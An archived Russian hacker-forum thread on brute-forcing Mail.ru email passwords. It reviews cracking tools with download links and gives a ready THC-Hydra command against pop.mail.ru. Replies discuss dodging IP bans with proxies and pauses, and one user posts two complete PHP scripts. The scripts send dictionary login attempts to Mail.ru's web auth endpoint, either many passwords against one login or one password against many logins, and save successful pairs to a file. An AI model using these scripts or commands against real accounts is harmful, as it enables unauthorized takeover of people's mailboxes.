Чем брутить Mail.ru [Архив]

Просмотр полной версии : Чем брутить Mail.ru

bul.666

18.12.2007, 13:38

Чем брутить Mail.ru

Тестировать будем сервер pop.mail.ru
Заранее создадим пользователя и будем пытаться достать на него пароль...
Создали пользователя cccbbbaaa@mail.ru:alphabet
Будем атаковать по словарю, т.к. полным перебором смысла нет в данном случае... Время скорости полного перебора зависит от сложности пароля...
Создал словарь 819 слов, где 818 - наш

1. Brutus-AET2
Самый известный и многофункциональный брутфорс. Небольшое описание:

Brutus - удаленный опознавательный агент (проще взломщик паролей). Brutus используется для восстановления правильных маркеров доступа (обычно имя пользователя и пароль) для данной системы. Примерами поддерживаемой системы могут быть FTP сервер, пароль защищенная web-страница, консоль маршрутизатора, POP3 сервер и т.д.
Предупреждение! Некоторые антивирусы реагируют на эту программу как "злонамеренная программа".
Платформа: Windows

Тут: http://www.securitylab.ru/software/232832.php
Скачать: http://securitylab.ru/_tools/brutus-aet2.zip
---
Как им пользоваться, смотрим видео: http://video.antichat.ru/file109.html
---
Итак брутим наше мыло:
Brutus Потратил 24 секунды на взлом нашего мыла...

2. THC-Hydra
Отличный брутфорс под nix.
THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

http://www.securitylab.ru/software/233034.php
http://freeworld.thc.org/thc-hydra/
---
Как пользоваться смотрим видео: http://video.antichat.ru/file110.html
---
Hydra потратила 17 секунд на взлом нашего мыла...
---

3. PHP Mail.Ru BruteForce by NOmeR1
Обсуждение: https://forum.antichat.ru/thread49574.html
Решил его сюда включить, т.к. скипт очень интересный и получил хорошие отзывы... Он не использует сокеты, он как бы пытаеться залогиниться через страницу mail.ru =)
---
Пользоваться очень легко, достаточно ввести нужное мыло, ваше мыло, и файл - словарь...
---
Скрипт потратил меньше 20 секунд на взлом нашего мыла...
---
Пожалуйста постим сюда только брутер и инфу...
За каждую дельную инфу ставлю +5 =)

AkyHa_MaTaTa

18.12.2007, 13:43

А как же genom mail-ru bruter ? Очень хороший скрипт, и работает пошустрее брутера на пхп.
Ок,здесь:
http://forum.antichat.ru/threadnav31521-1-10.html
http://forum.antichat.ru/showpost.php?p=264393&postcount=13
http://forum.antichat.ru/thread38778.html

скачать можно здесь (http://slil.ru/25251156)

bul.666

18.12.2007, 13:46

Пока потестил тока эти... Это не "Обзор всех брутеров"... По мере возможности буду выкладывать, что потестил...

Petr

27.02.2008, 20:18

Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи

Digimortal

27.02.2008, 20:49

>> Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи

кто-нибудь, знает после скольки попыток там банят по айпи ? )
если по http брутить?

Petr

28.02.2008, 07:32

Я как понялтам повремени банят, попытки не считал, т.к. каждый раз было по разному, и скорость перебора была разная, мой вывод был только по времени бесприрывного перебора, так что есть вариант делать паузы а естьв ариант прокси юзать, но брута под маил хттп с прокси я не видел.

URB-VOLK

07.03.2008, 23:07

У меня вопрос а может быть што неудастся сбрутить мылн с первого раза

H.T.N

14.03.2008, 20:11

У меня вопрос а можно более подробгое руководство по Aet2 про все функции?

Pernat1y

14.03.2008, 20:39

гидру юзай...

hydra -l login -P dictionary.dic -e ns -o log.txt -v pop.mail.ru pop3
она и побыстрее и в ней все мегапросто )

ZET36

16.03.2008, 11:11

гыг вот я тоже решил небольшой брутер майла на пхп написать

для брута одного логина несколькими паролями

<?php
$login="testbrute";

$passfile = "pass.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$passfile = "pass.txt";

$handle = fopen($passfile,"r");
$contents = fread($handle,filesize($passfile));
fclose($handle);
$contents = explode("\n",$contents);
$parol=trim($contents[$doscriot]);

$hostname = "win.mail.ru";
$path = "/cgi-bin/auth";
$line = "";

$fp = fsockopen($hostname, 80, $errno, $errstr, 30);

if (!$fp) echo "$errstr ($errno)<br />\n";
else
{

$data = "Login=".$login."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n";

$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " для логина ".$login." пароль ".$parol;

if (is_writable($zergood)) {

if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}

if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}

echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";

fclose($udacha);

} else {
echo "Файл $zergood недоступен для записи";
}

}

}

?>

для брута одного пароля на несколько логинов

<?php
$parol="123456";

$loginsfile = "login.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$loginsfile = "login.txt";

$handle = fopen($loginsfile,"r");
$contents = fread($handle,filesize($loginsfile));
fclose($handle);
$contents = explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);

$hostname = "win.mail.ru";
$path = "/cgi-bin/auth";
$line = "";

$fp = fsockopen($hostname, 80, $errno, $errstr, 30);

if (!$fp) echo "$errstr ($errno)<br />\n";
else
{

$data = "Login=".$loginsss."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n";

$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " у пароля ".$parol." логин ".$loginsss;

if (is_writable($zergood)) {

if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}

if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}

echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";

fclose($udacha);

} else {
echo "Файл $zergood недоступен для записи";
}

}

}

?>

результат запишется в файл good.txt по окончанию

лично моё мнение брутить со своей машины это жесть для траффика вот небольшой подарок у кого не анлимит запустил скрипт выключил комп лёг спать и за тебя твой сайт всё сделает и никакого расхода трафика)

Galina@

08.08.2008, 13:20

помогите восстановит пароль на мыло

NightStalkeR

10.08.2008, 08:09

для этого отдельная тема есть

Ra1mer

11.08.2008, 00:38

гыг вот я тоже решил небольшой брутер майла на пхп написать

для брута одного логина несколькими паролями

Запускаю.. Вылетает длинный столбец из скобок..
Скажите, а актуален скрипт ваще? Или я рукожоплю?